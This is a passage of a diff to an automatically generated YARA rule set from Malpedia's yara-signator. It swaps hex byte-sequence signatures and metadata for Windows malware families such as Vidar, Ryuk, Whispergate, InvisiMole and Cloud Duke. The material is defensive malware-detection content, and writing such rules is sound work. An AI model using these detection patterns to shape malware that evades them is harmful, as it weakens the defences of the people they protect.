+		$sequence_18 = { 0f1145c0 c7442458b4000500 c744245cb800a900 c7442460fb00b500 c74424641500fe00 }
+		$sequence_19 = { 01c3 69cbe8030000 81c130750000 4883ec20 }
+		$sequence_20 = { e9???????? b902000000 3bc1 0f85dc020000 498b7f18 }
+		$sequence_21 = { 01d1 89ca c1e205 89cb }
+		$sequence_22 = { 052797fa04 351337a665 8945f4 488b4510 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 1115136
 }
-rule MALPEDIA_Win_Vidar_Auto : FILE
+rule MALPEDIA_Win_Beepservice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4940e312-352d-5104-84b1-3e1a86d1ecab"
+		id = "600fce17-5c83-5bc3-9824-37a0fdef0a67"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vidar_auto.yar#L1-L422"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beepservice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.beepservice_auto.yar#L1-L268"
 		license_url = "N/A"
-		logic_hash = "78072c96fd4e60233539f368a83645e6e3c45bf8d23ede4d4f8a97936d6b546c"
+		logic_hash = "e9b2216bc0e3755a16cf68b15ef3152aac9ea65a9d59c9db364017acc5ba848e"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -81167,69 +81521,49 @@ rule MALPEDIA_Win_Vidar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 05c39e2600 894114 c1e810 25ff7f0000 c3 e8???????? 8b486c }
-		$sequence_1 = { 7202 8b00 8d8d68fdffff 51 50 }
-		$sequence_2 = { 8b7508 33db 895dd0 c746140f000000 895e10 8975cc }
-		$sequence_3 = { 8b8648af0100 c1e803 038644af0100 5e 5d c3 }
-		$sequence_4 = { 5f c6043300 8bc6 5e 5b c20400 }
-		$sequence_5 = { 89b55cfdffff 89bd60fdffff 8d450c 50 }
-		$sequence_6 = { d9e0 d99d00ffffff d98500ffffff d91c24 }
-		$sequence_7 = { 740a b800000500 e9???????? 57 }
-		$sequence_8 = { 895dfc e8???????? 83781408 c645fc01 }
-		$sequence_9 = { 8b7508 33ff 89b55cfdffff 89bd60fdffff }
-		$sequence_10 = { 56 8b742408 8b865caf0100 57 }
-		$sequence_11 = { 5e c20400 ff742408 e8???????? 59 83f8ff 7503 }
-		$sequence_12 = { c9 c3 8b542408 85d2 7503 33c0 c3 }
-		$sequence_13 = { 83781410 7202 8b00 50 8b45a0 }
-		$sequence_14 = { 50 ff15???????? 8b4da0 8901 }
-		$sequence_15 = { 53 68???????? 6802000080 ff15???????? 85c0 751b }
-		$sequence_16 = { c1e004 8bf0 0fbe4301 50 }
-		$sequence_17 = { 68???????? e8???????? 59 83f820 }
-		$sequence_18 = { 50 6a09 53 68???????? }
-		$sequence_19 = { 50 0fb605???????? 50 6a01 }
-		$sequence_20 = { 399e70af0600 7514 c78678af060001000000 c78670af060000000100 68fcff0100 8d8670af0400 }
-		$sequence_21 = { 53 50 899e6caf0600 e8???????? }
-		$sequence_22 = { 895df0 8d45f0 50 6a09 }
-		$sequence_23 = { 0fbe4301 50 8bc1 50 }
-		$sequence_24 = { 53 68???????? 8d8da8000000 e8???????? }
-		$sequence_25 = { 741d ff75f0 ff15???????? 895df0 395df0 740c }
-		$sequence_26 = { 68fcff0100 8d8670af0400 53 50 }
-		$sequence_27 = { c3 55 8bec 83ec0c 8365fc00 8365f400 8365f800 }
-		$sequence_28 = { 8910 8b4120 8910 8b4130 8910 c3 56 }
-		$sequence_29 = { 8d852cffffff 50 8d459c 50 }
-		$sequence_30 = { c20400 56 8bf1 e8???????? 6a00 ff74240c 8bce }
-		$sequence_31 = { 0faf450c 50 e8???????? 59 }
-		$sequence_32 = { 8b4508 8906 8b450c 894608 8b4510 }
-		$sequence_33 = { e8???????? c9 c3 55 8bec 83ec18 8b450c }
-		$sequence_34 = { 50 ff15???????? 6a1a e8???????? }
-		$sequence_35 = { 6860ea0000 6a00 ff15???????? 50 ff15???????? }
-		$sequence_36 = { ff15???????? 59 59 50 6a06 }
-		$sequence_37 = { 5f c21000 8bff 55 8bec 6a0a 6a00 }
-		$sequence_38 = { e8???????? 83c410 85c0 7404 6a99 ebcc }
-		$sequence_39 = { 83e03f 03d2 897110 894104 8911 5e c3 }
-		$sequence_40 = { 80780800 7404 33c0 40 c3 33c0 }
-		$sequence_41 = { dd1c24 83ec08 dd4508 dd1c24 6a0b 6a10 e8???????? }
-		$sequence_42 = { dd4508 dd1c24 6a0b 6a08 e8???????? 83c41c }
-		$sequence_43 = { eb0b 8b45f4 0500040000 8945f4 }
-		$sequence_44 = { 8bc6 5e c3 56 8bf1 6a08 }
-		$sequence_45 = { 8bc6 5e c20800 8b3f 85ff 7426 }
-		$sequence_46 = { 8bc6 5e c3 8b0a 80790d00 750c }
+		$sequence_0 = { ffd6 8bc8 ff15???????? 50 ff15???????? }
+		$sequence_1 = { 8b0d???????? 68???????? ffd6 8bc8 }
+		$sequence_2 = { 83c408 e9???????? 68???????? e8???????? 83c404 6a00 }
+		$sequence_3 = { 7512 6888130000 68???????? e8???????? }
+		$sequence_4 = { 83f801 7505 e8???????? 68???????? 68???????? }
+		$sequence_5 = { ff15???????? 50 68???????? e8???????? 83c408 e9???????? 68???????? }
+		$sequence_6 = { 683f000f00 6a00 68???????? ff15???????? }
+		$sequence_7 = { 53 ffd7 56 ff15???????? 85c0 5b }
+		$sequence_8 = { 8d85fcfdffff 68???????? 50 ff15???????? 83c410 }
+		$sequence_9 = { 6a14 57 68???????? 89442420 }
+		$sequence_10 = { 6a01 56 ff15???????? 85c0 7513 ff15???????? }
+		$sequence_11 = { 741c 3975fc 7517 57 ff15???????? 68???????? e8???????? }
+		$sequence_12 = { 8bec 81ec04020000 56 57 68???????? 68???????? }
+		$sequence_13 = { f3a4 8b7b08 83c9ff f2ae f7d1 49 83f914 }
+		$sequence_14 = { 52 6800240000 68???????? 56 }
+		$sequence_15 = { 8b5304 83c9ff 8bfa 33c0 f2ae f7d1 49 }
+		$sequence_16 = { 8b8dfcfdffff 51 ff15???????? 8985f0fdffff 83bdf0fdffff00 }
+		$sequence_17 = { 8b5104 52 68???????? e8???????? 83c408 eb0a }
+		$sequence_18 = { e8???????? 83c40c 6a20 6a00 68???????? e8???????? 83c40c }
+		$sequence_19 = { 8b4508 50 56 682a040000 ff15???????? }
+		$sequence_20 = { 50 6a01 e8???????? 83c414 a1???????? }
+		$sequence_21 = { e8???????? 8bb42438010000 8b3d???????? 8d4c240c 51 53 }
+		$sequence_22 = { 6a00 6a04 e8???????? 83c414 85c0 7510 ff15???????? }
+		$sequence_23 = { 668935???????? 7e15 b299 8a9874304000 32da }
+		$sequence_24 = { eb08 c744240c2a040000 8b54242c 8d4c2400 89542414 8b15???????? 56 }
+		$sequence_25 = { 5e 5b 81c428010000 c3 5f 5e 33c0 }
+		$sequence_26 = { ff248548144000 6888130000 6a01 6a00 6a00 6a03 }
 
 	condition:
-		7 of them and filesize < 4751360
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Ironhalo_Auto : FILE
+rule MALPEDIA_Win_Invisimole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b2edd4d8-243a-5455-b301-d36fe2c3ed3d"
+		id = "55a375db-e677-582e-bce8-b3a68908eaf5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ironhalo_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.invisimole_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "3a1ed5f7cc69a5a02f4dcd285f3d5642f43e5c8d6d88cc34ecaa1d07c458876f"
+		logic_hash = "8f39140cf09da2962c64c906a5e356fe5a001c88884a167cc322923fa7d9bdf4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81243,32 +81577,32 @@ rule MALPEDIA_Win_Ironhalo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd0 c1f905 83e21f 8b0c8d60e04000 f644d10401 7425 }
-		$sequence_1 = { 52 50 e8???????? 8d0476 83c408 8d0480 }
-		$sequence_2 = { 81c420430000 c3 8b8c2438430000 6a00 6800000084 6a00 }
-		$sequence_3 = { eb02 33c0 0fbe84c12c914000 c1f804 }
-		$sequence_4 = { 83651003 8bf0 750b c1e602 8b86b0c74000 }
-		$sequence_5 = { 8d0480 c1e005 50 ffd7 }
-		$sequence_6 = { b90a000000 33c0 8d7c2438 885c1410 f3ab }
-		$sequence_7 = { 8bc2 8bf2 c1f805 83e61f 8b048560e04000 8b04f0 83f8ff }
-		$sequence_8 = { 8d942428010000 f3ab b941000000 8d7c2424 f3ab }
-		$sequence_9 = { c744246801010000 ff15???????? 8b442408 8b35???????? }
+		$sequence_0 = { 52 33c9 57 66890b ff15???????? 6a10 6a00 }
+		$sequence_1 = { 8d4de4 51 8d88980f0000 51 c745eca8a94000 8955f0 c745f41e000000 }
+		$sequence_2 = { ff15???????? 8b55f4 53 33c9 52 66890f }
+		$sequence_3 = { 8bc1 0f848e110000 8d4dc8 51 8d75fc e8???????? 8bf0 }
+		$sequence_4 = { 8b7d8c 85ff 7450 33f6 3975ac 7628 83c704 }
+		$sequence_5 = { c645bc0d 668955bd 894dbf 8bde 7409 83c302 66833b2a }
+		$sequence_6 = { e8???????? 0fb64636 6a01 8d4dff 51 57 8845ff }
+		$sequence_7 = { c7464c00000080 c703ffffffff c6466c00 ff15???????? 8d55f0 52 }
+		$sequence_8 = { 53 56 ff15???????? 85c0 0f8595000000 3975fc 0f848c000000 }
+		$sequence_9 = { ff15???????? 8b4c2414 668944cf04 8b44241c 41 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Lightbunny_Auto : FILE
+rule MALPEDIA_Win_Wpbrutebot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86c71225-3e49-57f7-8a14-1d446e18ff78"
+		id = "898c87b0-2add-591b-b052-5ab6d1f02713"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightbunny_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wpbrutebot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wpbrutebot_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "33cbdcbf0c5d4d510f8f905bf01b71c8a0fd5566bc7f248daf644c66992c59c1"
+		logic_hash = "4440d9063c782ae6ab73b1ab2283579374719f22f3d62d05493ede3029f224d5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81282,34 +81616,34 @@ rule MALPEDIA_Win_Lightbunny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 8bf9 83f808 7278 807c06ff00 }
-		$sequence_1 = { 0f57c0 b802000000 0f1145ec 668945ec ff15???????? 8945f0 0fb7460c }
-		$sequence_2 = { 0f85c5000000 8b85fffeffff 57 8d7b08 3c01 7538 }
-		$sequence_3 = { 6a04 58 6bc000 c780cca7410002000000 }
-		$sequence_4 = { 56 8945f0 be10000000 40 8955e4 8b5508 894df4 }
-		$sequence_5 = { c705????????00000000 e8???????? 83c40c 6a06 6a01 6a02 ff15???????? }
-		$sequence_6 = { 69f224100000 81c6???????? 7410 c7460404000000 ff15???????? }
-		$sequence_7 = { 83c40c 81ff00010000 7367 8d85fcfdffff 889c3dfcfdffff 50 }
-		$sequence_8 = { 33c0 8d3c9d58ab4100 f00fb10f 8bc8 85c9 740b }
-		$sequence_9 = { 8bf0 b902000000 83feff 0f85f7feffff 68???????? e8???????? }
+		$sequence_0 = { 8b542438 83f90f 7433 83f90e 7425 8b07 3b5004 }
+		$sequence_1 = { e8???????? 8d8d7ceaffff e8???????? 8d8d64eaffff e8???????? 8d8d4ceaffff e8???????? }
+		$sequence_2 = { e9???????? 83ef05 8364241404 741c 85ff 7e17 55 }
+		$sequence_3 = { c3 c785b001000002000000 8b7c2410 ff37 ff15???????? 57 ff15???????? }
+		$sequence_4 = { c645fc0e e8???????? c645fc0b 8b8560feffff 83f810 7213 40 }
+		$sequence_5 = { c3 803e00 0f8508feffff 5f 5e 5d 33c0 }
+		$sequence_6 = { c3 83be0c06000000 744d 6a01 56 e8???????? ffb63c060000 }
+		$sequence_7 = { c7864c01000000000000 ff15???????? 8d8654010000 c7864001000000000000 50 e8???????? 8d8668030000 }
+		$sequence_8 = { ff15???????? 8b442428 83c404 898380000000 8bc6 c7879007000000000000 5e }
+		$sequence_9 = { e8???????? 83c404 85c0 0f85c3020000 80fb2e 0f8572f9ffff e9???????? }
 
 	condition:
-		7 of them and filesize < 2376704
+		7 of them and filesize < 5134336
 }
-rule MALPEDIA_Win_Webc2_Cson_Auto : FILE
+rule MALPEDIA_Win_Ryuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "13b28ac1-90a8-569b-9437-56c16ba607cd"
+		id = "721acb27-a4a0-50f9-a1d2-cd2f2b4d785d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_cson_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ryuk_auto.yar#L1-L449"
 		license_url = "N/A"
-		logic_hash = "9a18d875b3b14f91d30d03a0640ea0a5b789b8ad5cdc4c9d1d8ddab08372dfdc"
+		logic_hash = "445b298ca90f42d0360a842e111170d0d02597be6aa1ae9b7c72639822721220"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -81321,32 +81655,72 @@ rule MALPEDIA_Win_Webc2_Cson_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c414 85c0 0f8473ffffff 6a06 }
-		$sequence_1 = { 740a 68???????? e9???????? 8d45c0 }
-		$sequence_2 = { 744d 8d85d8feffff 50 56 e8???????? 85c0 }
-		$sequence_3 = { 6a0f f3ab 66ab aa 59 33c0 8d7d81 }
-		$sequence_4 = { 57 33db b9ff630000 33c0 }
-		$sequence_5 = { e9???????? 8d45c0 68???????? 50 ff15???????? }
-		$sequence_6 = { 8a4c0588 884c05c0 40 83f840 72ec }
-		$sequence_7 = { 50 ff15???????? 8d85acfeffff 50 e8???????? 80bc05abfeffff5c 59 }
-		$sequence_8 = { 0fbec1 83e81d c3 80f961 7c0c 80f97a }
-		$sequence_9 = { 8bc7 5f 5e c3 ff15???????? 6a09 }
+		$sequence_0 = { 68???????? 6a01 6a00 6814010000 }
+		$sequence_1 = { 85c0 7508 6a01 ff15???????? 68???????? 6a01 }
+		$sequence_2 = { 6a08 6a18 68???????? 68???????? 68???????? }
+		$sequence_3 = { 7578 6a10 6a18 68???????? }
+		$sequence_4 = { 66398818000035 753e 8b4508 b9???????? 2bc1 50 }
+		$sequence_5 = { 68???????? 68???????? 68???????? ff15???????? 85c0 7525 6a08 }
+		$sequence_6 = { ff15???????? 85c0 7542 6a28 6a18 68???????? }
+		$sequence_7 = { ff15???????? 85c0 7578 6a10 }
+		$sequence_8 = { 81b8????????50450000 754c b90b010000 66398818000035 753e 8b4508 }
+		$sequence_9 = { 68c0cf6a00 ff15???????? 6a01 ff15???????? }
+		$sequence_10 = { e8???????? 68e8030000 ff15???????? 68???????? e8???????? }
+		$sequence_11 = { 7407 b801000000 eb0b eb04 33c0 eb05 b801000000 }
+		$sequence_12 = { ba01000000 c1e200 8b45fc 880c10 b904000000 6bd103 817c15d8ff000000 }
+		$sequence_13 = { b804000000 c1e000 8b4c05d8 83c101 ba04000000 c1e200 894c15d8 }
+		$sequence_14 = { 2b4df4 394dfc 7312 ba01000000 }
+		$sequence_15 = { ba01000000 8b4df0 d3e2 0b55f8 8955f8 ebd6 eb02 }
+		$sequence_16 = { 0f870b020000 720c 8b459c 3b45f4 0f87fd010000 b904000000 c1e100 }
+		$sequence_17 = { 6bc203 8b4dfc c6040100 ba01000000 d1e2 8b45fc c6041000 }
+		$sequence_18 = { ff15???????? b811000000 e9???????? e9???????? }
+		$sequence_19 = { 7407 48 85c0 7ff0 }
+		$sequence_20 = { 6a00 6814010000 ff7508 ff35???????? ff15???????? }
+		$sequence_21 = { ff35???????? ff15???????? 833d????????00 6a10 6a18 }
+		$sequence_22 = { 751b ff35???????? ff35???????? 6a01 68???????? e8???????? 83c410 }
+		$sequence_23 = { ff15???????? b803000000 eb05 b805000000 }
+		$sequence_24 = { 2bf0 33c0 66890473 83ffff }
+		$sequence_25 = { 56 ff15???????? 8bcb 8d5102 }
+		$sequence_26 = { e8???????? e8???????? b9e8030000 ff15???????? }
+		$sequence_27 = { 7714 7212 81f9d0070000 770a 85d2 }
+		$sequence_28 = { eb0b 8bc1 99 f7fe }
+		$sequence_29 = { 0f9fc0 5d c3 8bff 55 8bec 8b4508 }
+		$sequence_30 = { 8d5f02 668b4702 83c702 6685c0 }
+		$sequence_31 = { 488bc3 4883c430 5b c3 48895c2408 48896c2410 }
+		$sequence_32 = { 53 d1fe e8???????? 83c408 8d5002 }
+		$sequence_33 = { 6685c9 75f5 2bf2 68???????? 53 }
+		$sequence_34 = { 8bc8 83e103 f3a4 8d7afe 668b4702 8d7f02 }
+		$sequence_35 = { 8d7f02 6685c0 75f4 a1???????? 8907 eb03 }
+		$sequence_36 = { 83c202 6685c0 75f5 8d7bfe 2bd6 8d5f02 }
+		$sequence_37 = { 498bc1 c3 4053 4883ec20 8bc1 498bd8 }
+		$sequence_38 = { 4883c428 c3 48895c2408 57 4883ec30 8364242000 }
+		$sequence_39 = { ba00000040 ff15???????? 488bd8 ff15???????? 83f820 }
+		$sequence_40 = { ff15???????? 41b900800000 4533c0 488bd6 488bcf }
+		$sequence_41 = { 66837f0254 750f 66837f0641 7508 }
+		$sequence_42 = { 66833f4e 7516 66837f0254 750f }
+		$sequence_43 = { 33c9 ba10270000 41b800100000 448d4904 ff15???????? }
+		$sequence_44 = { d1e8 03c2 c1e806 6bc05a }
+		$sequence_45 = { e8???????? 99 2bc2 d1f8 85c0 }
+		$sequence_46 = { 33c9 ff15???????? 48897c2430 488d4c2440 c744242802000000 4533c9 }
+		$sequence_47 = { 8b5c3050 ff15???????? 41b900300000 c744242040000000 }
+		$sequence_48 = { ff15???????? 488bf8 4885c0 7410 ff15???????? 488bc8 }
+		$sequence_49 = { e8???????? 84c0 746c e8???????? 488d0d63080000 e8???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 7450624
 }
-rule MALPEDIA_Win_Whispergate_Auto : FILE
+rule MALPEDIA_Win_Allaple_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "268f4f00-7468-54d8-b348-346d201993cc"
+		id = "c8febfcb-b725-537f-8f54-423e8f8493e3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whispergate_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.allaple_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "a494914334df13264ae7aa19a2f5e165c28339f35ad7afc6f2c9baf4d999ad12"
+		logic_hash = "f37966362a7b1531336f0a212f7c22ad8f69248a7c762c12dc2134fd4316ec00"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81360,32 +81734,32 @@ rule MALPEDIA_Win_Whispergate_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89442404 8b4208 890424 e8???????? 85c0 7426 8b4b04 }
-		$sequence_1 = { 85d2 c7049100000000 75f2 31c0 }
-		$sequence_2 = { 83c101 84c0 8842ff 75f0 8b4508 890424 8b75d0 }
-		$sequence_3 = { e8???????? e9???????? c745c000000000 e9???????? 8903 8b5db8 85db }
-		$sequence_4 = { 83c41c c3 c705????????ffffffff dbe3 }
-		$sequence_5 = { 784f 891c24 e8???????? 85f6 }
-		$sequence_6 = { c7042400000000 e8???????? 8d5001 89542404 }
-		$sequence_7 = { 83ec0c 85c0 0f84a8000000 8b442438 }
-		$sequence_8 = { c1e004 e8???????? 29c4 c745e400000000 c745d400000000 }
-		$sequence_9 = { 89de 8d44240c 89c7 8945c8 0fb603 3c7f 7428 }
+		$sequence_0 = { 03c2 c1f803 8b4d08 33d2 8a1401 8b45f4 25ff000000 }
+		$sequence_1 = { e8???????? 83c40c 8d45f8 50 8d85a0fdffff 50 ff75fc }
+		$sequence_2 = { 03d1 8955f8 8b45fc 83c001 8945fc 8b4df0 034dec }
+		$sequence_3 = { ff75fc 8d4df0 51 e8???????? 83c408 8d8578ffffff 50 }
+		$sequence_4 = { 8b55f4 33d1 0355b0 8b45fc 8d8c10442229f4 894dfc 8b55fc }
+		$sequence_5 = { 55 8bec 8b5510 8b4d0c 8b4108 }
+		$sequence_6 = { 56 57 8b5d08 8b5b04 c7432c00000000 5f }
+		$sequence_7 = { 894821 8b450c 5f 5e 8be5 5d c20c00 }
+		$sequence_8 = { 33ff 683f000f00 57 57 ff15???????? 8bd8 3bc7 }
+		$sequence_9 = { 8b4208 33852cffffff 3345cc 8945e4 8b4d08 8b510c }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Darkbit_Auto : FILE
+rule MALPEDIA_Win_Sarhust_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "17d9f575-1833-580e-9f9a-26ac57d772c0"
+		id = "52e2651a-2a6e-5230-b7b1-6048b76df517"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkbit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkbit_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sarhust_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "a8284822bcb0339f6639d77d907a6e073020f408fd2caaa614e40aa5d0446833"
+		logic_hash = "714fe7fd57f34b3db5ebbf318cfb9e33c9b49986cf0bcf43914f2398aec0102c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81399,32 +81773,32 @@ rule MALPEDIA_Win_Darkbit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 488d0d93861800 48898c2488010000 4889842490010000 488b8424f8010000 488b9c2478010000 488b8c2490000000 }
-		$sequence_1 = { e8???????? 488d3d5b7d2200 e8???????? e8???????? 48898424e0240000 48899c24b0080000 488b0d???????? }
-		$sequence_2 = { eb42 48898424d0020000 48899c24f0000000 488d0504370300 488b9c24d8020000 e8???????? 488b9c24f0000000 }
-		$sequence_3 = { b91b000000 e8???????? 90 488b15???????? 488b8c2498000000 31ff 4889c6 }
-		$sequence_4 = { e8???????? 488d05533f3800 bb1e000000 e8???????? 488d05a0293800 bb11000000 e8???????? }
-		$sequence_5 = { ebd7 4885db 742e 4889b110010000 48899118010000 488d05cc9b3700 e8???????? }
-		$sequence_6 = { 90 90 488d0511971600 bb01000000 4889d9 e8???????? 4889842438010000 }
-		$sequence_7 = { e8???????? 488d3d8fdd2100 e8???????? 6690 e8???????? 48898424681d0000 48899c2438010000 }
-		$sequence_8 = { 90 4c8ba424e0030000 4d21d4 4d21e9 4d09cc 4c89a42410070000 48c784244006000000000000 }
-		$sequence_9 = { 90 c744245b44588096 c644245fcd c74424562c14e1d8 c644245a6c 31c0 e9???????? }
+		$sequence_0 = { e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
+		$sequence_1 = { 6801000080 ff15???????? 85c0 7408 ff15???????? }
+		$sequence_2 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
+		$sequence_3 = { eb08 8b4520 8b4d0c 8908 }
+		$sequence_4 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff }
+		$sequence_5 = { 8d8d4cffffff e8???????? 6a00 ff15???????? }
+		$sequence_6 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
+		$sequence_7 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? }
+		$sequence_8 = { 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 }
+		$sequence_9 = { e8???????? 8d8d4cffffff e8???????? 8d8d4cffffff e8???????? 6a00 ff15???????? }
 
 	condition:
-		7 of them and filesize < 11612160
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Pinchduke_Auto : FILE
+rule MALPEDIA_Win_Cloud_Duke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0794d793-2c22-5bd4-a61c-badc5e0c2c07"
+		id = "faff812c-4777-587b-9604-c74c7f7c8370"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pinchduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pinchduke_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloud_duke_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "59fabedb52194937fd24b19da68caeec236a55861258ee349d09c23df6cfa041"
+		logic_hash = "c237687bdb3916be1afbb15c7aa4edc82ffc9e06f6334b5efe36ab376ab13130"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -81438,32 +81812,32 @@ rule MALPEDIA_Win_Pinchduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b702c 8bfe c1cf08 23fa c1c608 23f1 0bfe }
-		$sequence_1 = { 7d06 8bc7 f7d8 eb02 8bc7 3bc3 750e }
-		$sequence_2 = { c745dc02000000 6810010000 e8???????? 85c0 59 740e ff75f0 }
-		$sequence_3 = { 53 56 57 bf10270000 57 e8???????? 6a04 }
-		$sequence_4 = { 3bc3 59 59 8945f0 0f84ec010000 68???????? 50 }
-		$sequence_5 = { 6a09 33ff 57 68???????? 6801000080 ffd3 85c0 }
-		$sequence_6 = { 57 50 6a00 8944241c ffd3 50 ffd5 }
-		$sequence_7 = { 334804 035dfc 33483c 8bfa 33481c c1c705 8975f4 }
-		$sequence_8 = { 334828 8bfe 334808 c1c705 33481c c14df002 8d943bdcbc1b8f }
-		$sequence_9 = { e8???????? 8d4dcc e8???????? 8d45f0 50 68???????? 6802000080 }
+		$sequence_0 = { 8844241b e9???????? 8bce b8???????? }
+		$sequence_1 = { 8d8c241c030000 8d5102 8d642400 668b01 83c102 6685c0 75f5 }
+		$sequence_2 = { 2bca 8b95dcfbffff d1f9 8d4202 8985e0fbffff 8bff 668b02 }
+		$sequence_3 = { 83c404 ff742424 e8???????? 8b44246c }
+		$sequence_4 = { 81e1ff000080 7908 49 81c900ffffff 41 880c3e 46 }
+		$sequence_5 = { 57 51 8d8c24e4000000 e8???????? 83c410 84c0 7437 }
+		$sequence_6 = { 42 8954242c 3b94243c010000 0f8cc7f4ffff 8b742424 e9???????? }
+		$sequence_7 = { 8b4e10 2bc1 83f801 0f868c000000 8d7901 }
+		$sequence_8 = { 6a3c 6a00 50 e8???????? 8d842428030000 }
